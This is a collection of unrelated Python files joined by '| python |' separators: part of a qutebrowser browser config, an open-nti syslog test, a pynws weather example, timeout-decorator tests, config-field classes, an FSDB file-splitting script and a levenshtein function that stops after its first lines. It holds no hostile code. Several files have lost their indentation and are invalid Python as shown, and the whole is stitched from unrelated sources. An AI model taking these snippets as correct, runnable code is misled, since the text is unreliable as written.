# - auto: Whenever a completion is requested.
# - never: Never.
c.completion.show = 'always'
# Shrink the completion to be smaller than the configured size if there
# are no scrollbars.
# Type: Bool
c.completion.shrink = True
# Width (in pixels) of the scrollbar in the completion window.
# Type: Int
c.completion.scrollbar.width = 12
# Padding (in pixels) of the scrollbar handle in the completion window.
# Type: Int
c.completion.scrollbar.padding = 2
# Format of timestamps (e.g. for the history completion). See
# https://sqlite.org/lang_datefunc.html for allowed substitutions.
# Type: String
c.completion.timestamp_format = '%d/%m'
# Delay (in milliseconds) before updating completions after typing a
# character.
# Type: Int
c.completion.delay = 0
# Minimum amount of characters needed to update completions.
# Type: Int
c.completion.min_chars = 1
# Execute the best-matching command on a partial match.
# Type: Bool
c.completion.use_best_match = False
# Directory to save downloads to. If unset, a sensible OS-specific
# default is used.
# Type: Directory
c.downloads.location.directory = '/home/jagreen/dld'
# Prompt the user for the download location. If set to false,
# `downloads.location.directory` will be used.
# Type: Bool
c.downloads.location.prompt = False
# Remember the last used download directory.
# Type: Bool
c.downloads.location.remember = True
# What to display in the download filename input.
# Type: String
# Valid values:
# - path: Show only the download path.
# - filename: Show only download filename.
# - both: Show download path and filename.
c.downloads.location.suggestion = 'path'
# Default program used to open downloads. If null, the default internal
# handler is used. Any `{}` in the string will be expanded to the
# filename, else the filename will be appended.
# Type: String
c.downloads.open_dispatcher = None
# Where to show the downloaded files.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.downloads.position = 'top'
# Duration (in milliseconds) to wait before removing finished downloads.
# If set to -1, downloads are never removed.
# Type: Int
c.downloads.remove_finished = 50
# Editor (and arguments) to use for the `open-editor` command. The
# following placeholders are defined: * `{file}`: Filename of the file
# to be edited. * `{line}`: Line in which the caret is found in the
# text. * `{column}`: Column in which the caret is found in the text. *
# `{line0}`: Same as `{line}`, but starting from index 0. * `{column0}`:
# Same as `{column}`, but starting from index 0.
# Type: ShellCommand
c.editor.command = ['nvim', '{file}']
# Encoding to use for the editor.
# Type: Encoding
c.editor.encoding = 'utf-8'
# When a hint can be automatically followed without pressing Enter.
# Type: String
# Valid values:
# - always: Auto-follow whenever there is only a single hint on a page.
# - unique-match: Auto-follow whenever there is a unique non-empty match in either the hint string (word mode) or filter (number mode).
# - full-match: Follow the hint when the user typed the whole hint (letter, word or number mode) or the element's text (only in number mode).
# - never: The user will always need to press Enter to follow a hint.
c.hints.auto_follow = 'unique-match'
# Duration (in milliseconds) to ignore normal-mode key bindings after a
# successful auto-follow.
# Type: Int
c.hints.auto_follow_timeout = 0
# CSS border value for hints.
# Type: String
c.hints.border = '1px solid #dadada'
# Characters used for hint strings.
# Type: UniqueCharString
c.hints.chars = 'asdfghjkl'
# Dictionary file to be used by the word hints.
# Type: File
c.hints.dictionary = '/usr/share/dict/words'
# Hide unmatched hints in rapid mode.
# Type: Bool
c.hints.hide_unmatched_rapid_hints = True
# Minimum number of characters used for hint strings.
# Type: Int
c.hints.min_chars = 1
# Mode to use for hints.
# Type: String
# Valid values:
# - number: Use numeric hints. (In this mode you can also type letters from the hinted element to filter and reduce the number of elements that are hinted.)
# - letter: Use the characters in the `hints.chars` setting.
# - word: Use hints words based on the html elements and the extra words.
c.hints.mode = 'letter'
# Comma-separated list of regular expressions to use for 'next' links.
# Type: List of Regex
c.hints.next_regexes = ['\\bnext\\b', '\\bmore\\b', '\\bnewer\\b', '\\b[>→≫]\\b', '\\b(>>|»)\\b', '\\bcontinue\\b']
# Comma-separated list of regular expressions to use for 'prev' links.
# Type: List of Regex
c.hints.prev_regexes = ['\\bprev(ious)?\\b', '\\bback\\b', '\\bolder\\b', '\\b[<←≪]\\b', '\\b(<<|«)\\b']
# Scatter hint key chains (like Vimium) or not (like dwb). Ignored for
# number hints.
# Type: Bool
c.hints.scatter = True
# Make characters in hint strings uppercase.
# Type: Bool
c.hints.uppercase = False
# Allow Escape to quit the crash reporter.
# Type: Bool
c.input.escape_quits_reporter = True
# Automatically enter insert mode if an editable element is focused
# after loading the page.
# Type: Bool
c.input.insert_mode.auto_load = True
# Enter insert mode if an editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_enter = True
# Leave insert mode if a non-editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_leave = True
# Switch to insert mode when clicking flash and other plugins.
# Type: Bool
c.input.insert_mode.plugins = False
# Include hyperlinks in the keyboard focus chain when tabbing.
# Type: Bool
c.input.links_included_in_focus_chain = True
# Timeout (in milliseconds) for partially typed key bindings. If the
# current input forms only partial matches, the keystring will be
# cleared after this time.
# Type: Int
c.input.partial_timeout = 5000
# Enable spatial navigation. Spatial navigation consists in the ability
# to navigate between focusable elements in a Web page, such as
# hyperlinks and form controls, by using Left, Right, Up and Down arrow
# keys. For example, if the user presses the Right key, heuristics
# determine whether there is an element he might be trying to reach
# towards the right and which element he probably wants.
# Type: Bool
c.input.spatial_navigation = False
# Rounding radius (in pixels) for the edges of the keyhint dialog.
# Type: Int
c.keyhint.radius = 6
# Time (in milliseconds) from pressing a key to seeing the keyhint
# dialog.
# Type: Int
c.keyhint.delay = 500
# Duration (in milliseconds) to show messages in the statusbar for. Set
# to 0 to never clear messages.
# Type: Int
c.messages.timeout = 5000
# Show a filebrowser in download prompts.
# Type: Bool
c.prompt.filebrowser = True
# Rounding radius (in pixels) for the edges of prompts.
# Type: Int
c.prompt.radius = 8
# Enable smooth scrolling for web pages. Note smooth scrolling does not
# work with the `:scroll-px` command.
# Type: Bool
c.scrolling.smooth = True
# Languages to use for spell checking. You can check for available
# languages and install dictionaries using scripts/dictcli.py. Run the
# script with -h/--help for instructions.
# Type: List of String
# Valid values:
# - af-ZA: Afrikaans (South Africa)
# - bg-BG: Bulgarian (Bulgaria)
# - ca-ES: Catalan (Spain)
# - cs-CZ: Czech (Czech Republic)
# - da-DK: Danish (Denmark)
# - de-DE: German (Germany)
# - el-GR: Greek (Greece)
# - en-AU: English (Australia)
# - en-CA: English (Canada)
# - en-GB: English (United Kingdom)
# - en-US: English (United States)
# - es-ES: Spanish (Spain)
# - et-EE: Estonian (Estonia)
# - fa-IR: Farsi (Iran)
# - fo-FO: Faroese (Faroe Islands)
# - fr-FR: French (France)
# - he-IL: Hebrew (Israel)
# - hi-IN: Hindi (India)
# - hr-HR: Croatian (Croatia)
# - hu-HU: Hungarian (Hungary)
# - id-ID: Indonesian (Indonesia)
# - it-IT: Italian (Italy)
# - ko: Korean
# - lt-LT: Lithuanian (Lithuania)
# - lv-LV: Latvian (Latvia)
# - nb-NO: Norwegian (Norway)
# - nl-NL: Dutch (Netherlands)
# - pl-PL: Polish (Poland)
# - pt-BR: Portuguese (Brazil)
# - pt-PT: Portuguese (Portugal)
# - ro-RO: Romanian (Romania)
# - ru-RU: Russian (Russia)
# - sh: Serbo-Croatian
# - sk-SK: Slovak (Slovakia)
# - sl-SI: Slovenian (Slovenia)
# - sq: Albanian
# - sr: Serbian
# - sv-SE: Swedish (Sweden)
# - ta-IN: Tamil (India)
# - tg-TG: Tajik (Tajikistan)
# - tr-TR: Turkish (Turkey)
# - uk-UA: Ukrainian (Ukraine)
# - vi-VN: Vietnamese (Viet Nam)
c.spellcheck.languages = ['en-GB']
# Padding (in pixels) for the statusbar.
# Type: Padding
c.statusbar.padding = {'top': 1, 'left': 0, 'bottom': 1, 'right': 0}
# Position of the status bar.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.statusbar.position = 'bottom'
# List of widgets displayed in the statusbar.
# Type: List of String
# Valid values:
# - url: Current page URL.
# - scroll: Percentage of the current page position like `10%`.
# - scroll_raw: Raw percentage of the current page position like `10`.
# - history: Display an arrow when possible to go back/forward in history.
# - tabs: Current active tab, e.g. `2`.
# - keypress: Display pressed keys when composing a vi command.
# - progress: Progress bar for the current page loading.
c.statusbar.widgets = ['keypress', 'url', 'scroll', 'history', 'tabs', 'progress']
# Open new tabs (middleclick/ctrl+click) in the background.
# Type: Bool
c.tabs.background = True
# Mouse button with which to close tabs.
# Type: String
# Valid values:
# - right: Close tabs on right-click.
# - middle: Close tabs on middle-click.
# - none: Don't close tabs using the mouse.
c.tabs.close_mouse_button = 'middle'
# How to behave when the close mouse button is pressed on the tab bar.
# Type: String
# Valid values:
# - new-tab: Open a new tab.
# - close-current: Close the current tab.
# - close-last: Close the last tab.
# - ignore: Don't do anything.
c.tabs.close_mouse_button_on_bar = 'new-tab'
# Scaling factor for favicons in the tab bar. The tab size is unchanged,
# so big favicons also require extra `tabs.padding`.
# Type: Float
c.tabs.favicons.scale = 1.0
# When to show favicons in the tab bar.
# Type: String
# Valid values:
# - always: Always show favicons.
# - never: Always hide favicons.
# - pinned: Show favicons only on pinned tabs.
c.tabs.favicons.show = 'never'
# How to behave when the last tab is closed.
# Type: String
# Valid values:
# - ignore: Don't do anything.
# - blank: Load a blank page.
# - startpage: Load the start page.
# - default-page: Load the default page.
# - close: Close the window.
c.tabs.last_close = 'startpage'
# Switch between tabs using the mouse wheel.
# Type: Bool
c.tabs.mousewheel_switching = True
# Position of new tabs opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.related = 'next'
# Position of new tabs which are not opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.unrelated = 'last'
# Padding (in pixels) around text for tabs.
# Type: Padding
c.tabs.padding = {'top': 0, 'left': 5, 'bottom': 0, 'right': 5}
# When switching tabs, what input mode is applied.
# Type: String
# Valid values:
# - persist: Retain the current mode.
# - restore: Restore previously saved mode.
# - normal: Always revert to normal mode.
c.tabs.mode_on_change = 'normal'
# Position of the tab bar.
# Type: Position
# Valid values:
# - top
# - bottom
# - left
# - right
c.tabs.position = 'top'
# Which tab to select when the focused tab is removed.
# Type: SelectOnRemove
# Valid values:
# - prev: Select the tab which came before the closed one (left in horizontal, above in vertical).
# - next: Select the tab which came after the closed one (right in horizontal, below in vertical).
# - last-used: Select the previously selected tab.
c.tabs.select_on_remove = 'next'
# When to show the tab bar.
# Type: String
# Valid values:
# - always: Always show the tab bar.
# - never: Always hide the tab bar.
# - multiple: Hide the tab bar if only one tab is open.
# - switching: Show the tab bar when switching tabs.
c.tabs.show = 'always'
# Alignment of the text inside of tabs.
# Type: TextAlignment
# Valid values:
# - left
# - right
# - center
c.tabs.title.alignment = 'left'
# Format to use for the tab title for pinned tabs. The same placeholders
# like for `tabs.title.format` are defined.
# Type: FormatString
c.tabs.title.format_pinned = '{index}'
# Width (in pixels or as percentage of the window) of the tab bar if
# it's vertical.
# Type: PercOrInt
c.tabs.width = '20%'
# Width (in pixels) of the progress indicator (0 to disable).
# Type: Int
c.tabs.indicator.width = 3
# Padding (in pixels) for tab indicators.
# Type: Padding
c.tabs.indicator.padding = {'top': 2, 'left': 0, 'bottom': 2, 'right': 4}
# Shrink pinned tabs down to their contents.
# Type: Bool
c.tabs.pinned.shrink = True
# Wrap when changing tabs.
# Type: Bool
c.tabs.wrap = True
# What search to start when something else than a URL is entered.
# Type: String
# Valid values:
# - naive: Use simple/naive check.
# - dns: Use DNS requests (might be slow!).
# - never: Never search automatically.
# - schemeless: Always search automatically unless URL explicitly contains a scheme.
c.url.auto_search = 'naive'
# Page to open if :open -t/-b/-w is used without URL. Use `about:blank`
# for a blank page.
# Type: FuzzyUrl
c.url.default_page = 'file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html'
# Open base URL of the searchengine if a searchengine shortcut is
# invoked without parameters.
# Type: Bool
c.url.open_base_url = True
# Search engines which can be used via the address bar. Maps a search
# engine name (such as `DEFAULT`, or `ddg`) to a URL with a `{}`
# placeholder. The placeholder will be replaced by the search term, use
# `{{` and `}}` for literal `{`/`}` braces. The following further
# placeholders are defined to configure how special characters in the
# search terms are replaced by safe characters (called 'quoting'): *
# `{}` and `{semiquoted}` quote everything except slashes; this is the
# most sensible choice for almost all search engines (for the search
# term `slash/and&` this placeholder expands to `slash/and%26amp`).
# * `{quoted}` quotes all characters (for `slash/and&` this
# placeholder expands to `slash%2Fand%26amp`). * `{unquoted}` quotes
# nothing (for `slash/and&` this placeholder expands to
# `slash/and&`). The search engine named `DEFAULT` is used when
# `url.auto_search` is turned on and something else than a URL was
# entered to be opened. Other search engines can be used by prepending
# the search engine name to the search term, e.g. `:open google
# qutebrowser`.
# Type: Dict
c.url.searchengines = {'DEFAULT': 'https://www.google.com/search?q={}', 'google': 'https://www.google.com/search?q={}'}
# Page(s) to open at the start.
# Type: List of FuzzyUrl, or FuzzyUrl
c.url.start_pages = ['file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html']
# URL parameters to strip with `:yank url`.
# Type: List of String
c.url.yank_ignored_parameters = ['ref', 'utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content']
# Hide the window decoration. This setting requires a restart on
# Wayland.
# Type: Bool
c.window.hide_decoration = False
# Default zoom level.
# Type: Perc
c.zoom.default = '75%'
# Available zoom levels.
# Type: List of Perc
c.zoom.levels = ['25%', '33%', '50%', '67%', '75%', '90%', '100%', '110%', '125%', '150%', '175%', '200%', '250%', '300%', '400%', '500%']
# Number of zoom increments to divide the mouse wheel movements to.
# Type: Int
c.zoom.mouse_divider = 512
# Text color of the completion widget. May be a single color to use for
# all columns or a list of three colors, one for each column.
# Type: List of QtColor, or QtColor
c.colors.completion.fg = ['#dadada', '#dadada', '#dadada']
# Background color of the completion widget for odd rows.
# Type: QssColor
c.colors.completion.odd.bg = '#404552'
# Background color of the completion widget for even rows.
# Type: QssColor
c.colors.completion.even.bg = '#404552'
# Foreground color of completion widget category headers.
# Type: QtColor
c.colors.completion.category.fg = '#dadada'
# Background color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.bg = '#3a3f4d'
# Top border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.top = '#3a3f4d'
# Bottom border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.bottom = '#3a3f4d'
# Foreground color of the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.fg = '#000000'
# Background color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.bg = '#8ba870'
# Top border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.top = '#8ba870'
# Bottom border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.bottom = '#8ba870'
# Foreground color of the matched text in the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.match.fg = '#000000'
# Foreground color of the matched text in the completion.
# Type: QtColor
c.colors.completion.match.fg = '#dadada'
# Color of the scrollbar handle in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.fg = '#404552'
# Color of the scrollbar in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.bg = '#3a3f4d'
# Color gradient interpolation system for download text.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.fg = 'none'
# Color gradient interpolation system for download backgrounds.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.bg = 'none'
# Color gradient start for download text.
# Type: QtColor
c.colors.downloads.start.fg = '#000000'
# Color gradient start for download backgrounds.
# Type: QtColor
c.colors.downloads.start.bg = '#8ba870'
# Foreground color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.fg = '#dadada'
# Background color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.bg = '#966575'
# Font color for hints.
# Type: QssColor
c.colors.hints.fg = '#dadada'
# Background color for hints. Note that you can use a `rgba(...)` value
# for transparency.
# Type: QssColor
c.colors.hints.bg = '#404552'
# Font color for the matched part of hints.
# Type: QtColor
c.colors.hints.match.fg = '#e0be80'
# Highlight color for keys to complete the current keychain.
# Type: QssColor
c.colors.keyhint.suffix.fg = 'purple'
# Foreground color of an error message.
# Type: QssColor
c.colors.messages.error.fg = '#dadada'
# Background color of an error message.
# Type: QssColor
c.colors.messages.error.bg = '#966575'
# Border color of an error message.
# Type: QssColor
c.colors.messages.error.border = '#966575'
# Foreground color of a warning message.
# Type: QssColor
c.colors.messages.warning.fg = '#dadada'
# Background color of a warning message.
# Type: QssColor
c.colors.messages.warning.bg = '#968665'
# Border color of a warning message.
# Type: QssColor
c.colors.messages.warning.border = '#968665'
# Foreground color of an info message.
# Type: QssColor
c.colors.messages.info.fg = '#dadada'
# Background color of an info message.
# Type: QssColor
c.colors.messages.info.bg = '#657596'
# Border color of an info message.
# Type: QssColor
c.colors.messages.info.border = '#657596'
# Foreground color for prompts.
# Type: QssColor
c.colors.prompts.fg = '#dadada'
# Background color for prompts.
# Type: QssColor
c.colors.prompts.bg = '#404552'
# Foreground color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.fg = '#dadada'
# Background color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.bg = '#404552'
# Foreground color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.fg = '#000000'
# Background color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.bg = '#8ba870'
# Foreground color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.fg = '#dadada'
# Background color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.bg = '#5e8d87'
# Foreground color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.fg = '#dadada'
# Background color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.bg = '#383c4a'
# Foreground color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.fg = '#dadada'
# Background color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.bg = '#404552'
# Foreground color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.fg = '#dadada'
# Background color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.bg = '#383c4a'
# Foreground color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.fg = '#dadada'
# Background color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.bg = '#966894'
# Foreground color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.fg = '#dadada'
# Background color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.bg = '#b294bb'
# Background color of the progress bar.
# Type: QssColor
c.colors.statusbar.progress.bg = '#383c4a'
# Default foreground color of the URL in the statusbar.
# Type: QssColor
c.colors.statusbar.url.fg = '#dadada'
# Foreground color of the URL in the statusbar on error.
# Type: QssColor
c.colors.statusbar.url.error.fg = '#966575'
# Foreground color of the URL in the statusbar for hovered links.
# Type: QssColor
c.colors.statusbar.url.hover.fg = '#657596'
# Foreground color of the URL in the statusbar on successful load
# (http).
# Type: QssColor
c.colors.statusbar.url.success.http.fg = '#dadada'
# Foreground color of the URL in the statusbar on successful load
# (https).
# Type: QssColor
c.colors.statusbar.url.success.https.fg = '#8ba870'
# Foreground color of the URL in the statusbar when there's a warning.
# Type: QssColor
c.colors.statusbar.url.warn.fg = '#968665'
# Background color of the tab bar.
# Type: QssColor
c.colors.tabs.bar.bg = '#404552'
# Color for the tab indicator on errors.
# Type: QtColor
c.colors.tabs.indicator.error = '#966575'
# Color gradient start for the tab indicator.
# Type: QtColor
c.colors.tabs.indicator.start = '#968665'
# Color gradient end for the tab indicator.
# Type: QtColor
c.colors.tabs.indicator.stop = '#8ba870'
# Color gradient interpolation system for the tab indicator.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.tabs.indicator.system = 'none'
# Foreground color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.fg = '#dadada'
# Background color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.bg = '#3a3f4d'
# Foreground color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.fg = '#dadada'
# Background color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.bg = '#3a3f4d'
# Foreground color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.fg = '#dadada'
# Background color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.bg = '#404552'
# Foreground color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.fg = '#dadada'
# Background color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.bg = '#404552'
# Background color for webpages if unset (or empty to use the theme's
# color).
# Type: QtColor
c.colors.webpage.bg = 'white'
# Default font families to use.
# Type: Font
c.fonts.default_family = 'Inconsolata Nerd Font Mono'
# Default font size to use.
# Type: String
c.fonts.default_size = '8pt'
# Font used in the completion widget.
# Type: Font
c.fonts.completion.entry = 'default_size default_family'
# Font used in the completion categories.
# Type: Font
c.fonts.completion.category = 'default_size default_family'
# Font used for the debugging console.
# Type: Font
c.fonts.debug_console = 'default_size default_family'
# Font used for the downloadbar.
# Type: Font
c.fonts.downloads = 'default_size default_family'
# Font used for the hints.
# Type: Font
c.fonts.hints = 'default_size default_family'
# Font used in the keyhint widget.
# Type: Font
c.fonts.keyhint = 'default_size default_family'
# Font used for error messages.
# Type: Font
c.fonts.messages.error = 'default_size default_family'
# Font used for info messages.
# Type: Font
c.fonts.messages.info = 'default_size default_family'
# Font used for warning messages.
# Type: Font
c.fonts.messages.warning = 'default_size default_family'
# Font used for prompts.
# Type: Font
c.fonts.prompts = 'default_size default_family'
# Font used in the statusbar.
# Type: Font
c.fonts.statusbar = 'default_size default_family'
# This setting can be used to map keys to other keys. When the key used
# as dictionary-key is pressed, the binding for the key used as
# dictionary-value is invoked instead. This is useful for global
# remappings of keys, for example to map Ctrl-[ to Escape. Note that
# when a key is bound (via `bindings.default` or `bindings.commands`),
# the mapping is ignored.
# Type: Dict
c.bindings.key_mappings = {'<Ctrl+[>': '<Escape>', '<Ctrl+6>': '<Ctrl+^>', '<Ctrl+m>': '<Return>', '<Enter>': '<Return>', '<Shift+Enter>': '<Return>', '<Ctrl+Enter>': '<Ctrl+Return>', '<Ctrl+j>': '<Return>', '<Shift+Return>': '<Return>'}
| python |
from docker import Client
import open_nti_input_syslog_lib
import docker.tls as tls
import influxdb
import time
from os import path
import os
import shutil
import pprint
import subprocess
import json
import os.path
from sys import platform as _platform
import requests
import filecmp
import sys
from kafka import KafkaConsumer
from timeout import timeout
################################################################################
def test_connect_docker():
c = open_nti_input_syslog_lib.check_docker()
# Check if connection to Docker work by listing all images
list_images = c.images()
assert len(list_images) >= 1
def test_start_dependencies():
open_nti_input_syslog_lib.start_open_nti()
assert open_nti_input_syslog_lib.check_influxdb_running_database_exist()
# open_nti_input_syslog_lib.start_kafka()
# assert open_nti_input_syslog_lib.check_kafka_is_running()
def test_syslog_qfx_influx_01():
FNAME = 'test_syslog_qfx_01'
PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
open_nti_input_syslog_lib.start_fluentd_syslog(output_influx='true')
open_nti_input_syslog_lib.replay_file(PCAP_FILE)
time.sleep(5)
db = open_nti_input_syslog_lib.get_influxdb_handle()
query = 'SELECT * FROM events'
result = db.query(query)
points = result.get_points()
assert len(list(points)) != 0
# @timeout(30)
# def test_syslog_qfx_kafka_01():
#
# FNAME = 'test_syslog_qfx_01'
# PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
#
# open_nti_input_syslog_lib.start_fluentd_syslog(output_kafka='true')
# time.sleep(1)
# open_nti_input_syslog_lib.replay_file(PCAP_FILE)
#
# time.sleep(5)
#
# counter = open_nti_input_syslog_lib.check_kafka_msg()
#
# assert counter == 100
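# Module-level teardown: stop the fluentd and open-nti containers started for these tests.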
def teardown_module(module):
global c
global TCP_RELAY_CONTAINER_NAME
# if not os.getenv('TRAVIS'):
open_nti_input_syslog_lib.stop_fluentd()
open_nti_input_syslog_lib.stop_open_nti()
# open_nti_input_syslog_lib.stop_kafka()
try:
old_container_id = c.inspect_container(TCP_RELAY_CONTAINER_NAME)['Id']
c.stop(container=old_container_id)
c.remove_container(container=old_container_id)
    except Exception:
        print("Container does not exist")
| python |
import asyncio
import aiohttp
import pynws
PHILLY = (39.95, -75.16)
USERID = "[email protected]"
async def example():
async with aiohttp.ClientSession() as session:
nws = pynws.SimpleNWS(*PHILLY, USERID, session)
await nws.set_station()
await nws.update_observation()
await nws.update_forecast()
await nws.update_alerts_forecast_zone()
print(nws.observation)
print(nws.forecast[0])
print(nws.alerts_forecast_zone)
loop = asyncio.get_event_loop()
loop.run_until_complete(example())
| python |
##
# File: TimeoutDecoratorTests.py
# Author: J. Westbrook
# Date: 25-Oct-2019
# Version: 0.001
#
# Updates:
##
"""
Test cases for timeout decorator
"""
__docformat__ = "google en"
__author__ = "John Westbrook"
__email__ = "[email protected]"
__license__ = "Apache 2.0"
import logging
import os
import time
import unittest
from rcsb.utils.io.decorators import timeout, timeoutMp, TimeoutException
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(os.path.dirname(HERE)))
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
@timeoutMp(10)
def longrunner2():
iSeconds = 20
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
class TimeoutDecoratorTests(unittest.TestCase):
"""
Test cases for timeout decorator
"""
def setUp(self):
#
self.__startTime = time.time()
logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
endTime = time.time()
logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
@timeout(10)
def __longrunner1(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
def testTimeoutSignal(self):
"""Test case - timeout decorator (signal)"""
try:
self.__longrunner1(20)
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
@timeoutMp(10)
def __longrunner2(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
@unittest.skip("Python 3.8 macos serialization issue")
def testTimeoutMulti(self):
"""Test case - timeout decorator (multiprocessing)"""
try:
longrunner2()
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
def suiteTimeout():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutMulti"))
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutSignal"))
return suiteSelect
if __name__ == "__main__":
mySuite = suiteTimeout()
unittest.TextTestRunner(verbosity=2).run(mySuite)
| python |
"""
Classes of config fields, description of standard models of config fields.
"""
import pprint
class DefaultConfigField:
"""Config field containing any value"""
def __init__(self, name: str, value: any = None):
self.name = name
self._value = value
    @property
    def value(self):
        return self._value

    @value.setter
    def value(self, value: any):
        if value is not None:
            self._value = value
def __repr__(self):
return f"(default) {self.name}: {self.value}"
def __str__(self):
return f"(default) {self.name}: {self.value}"
class ImmutableConfigField(DefaultConfigField):
"""Immutable config field"""
def __init__(self, name: str, value: any = None):
super(ImmutableConfigField, self).__init__(name, value)
    @property
    def value(self):
        return self._value

    @value.setter
    def value(self, value: any):
        # Ignore writes once a value has been set, keeping the field immutable.
        if self._value is None:
            self._value = value
class SecretConfigField(DefaultConfigField):
"""Config Secret (Encrypted)"""
...
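# Minimal usage sketch (illustrative only, not part of the original module):
# construct a couple of fields and rely on their __repr__/__str__ for display.
if __name__ == "__main__":
    host = DefaultConfigField("host", "localhost")
    port = ImmutableConfigField("port", 8080)
    pprint.pprint([host, port])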
| python |
#!/usr/bin/python3
"""fsdb2many converts a single FSDB file into many, by creating
other file names based on a column of the original."""
import sys
import argparse
import pyfsdb
import re
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=__doc__,
epilog="fsdb2many -c key -o outputdir/%s.fsdb mybigfile.fsdb")
parser.add_argument("-c", "--column", default="key", type=str,
help="Column to split on")
parser.add_argument("-o", "--output-pattern",
default="fsdb2many-out-%s.fsdb",
type=str,
help="Output pattern to split on, which should contain a PERCENT S to use for inserting the column value being saved to that file.")
parser.add_argument("input_file", type=argparse.FileType('r'),
nargs='?', default=sys.stdin,
help="str")
args = parser.parse_args()
return args
def main():
args = parse_args()
# open the input file
inh = pyfsdb.Fsdb(file_handle=args.input_file)
key_column = inh.get_column_number(args.column)
out_handles = {}
for row in inh:
value = row[key_column]
# see if we have an open file handle for this one yet
if value not in out_handles:
# new value, so open a new file handle to save data for it
file_name = re.sub("[^-.0-9a-zA-Z_]", "_", str(value))
outh = pyfsdb.Fsdb(out_file=(args.output_pattern % file_name))
outh.column_names = inh.column_names
out_handles[value] = outh
# save the row to the file based on its value
out_handles[value].append(row)
# clean up
for handle in out_handles:
out_handles[handle].close()
if __name__ == "__main__":
main()
| python |
def levenshtein(a, b):
    """Return the Levenshtein (edit) distance between sequences a and b."""
    # Standard two-row dynamic-programming formulation.
    if len(a) < len(b):
        a, b = b, a
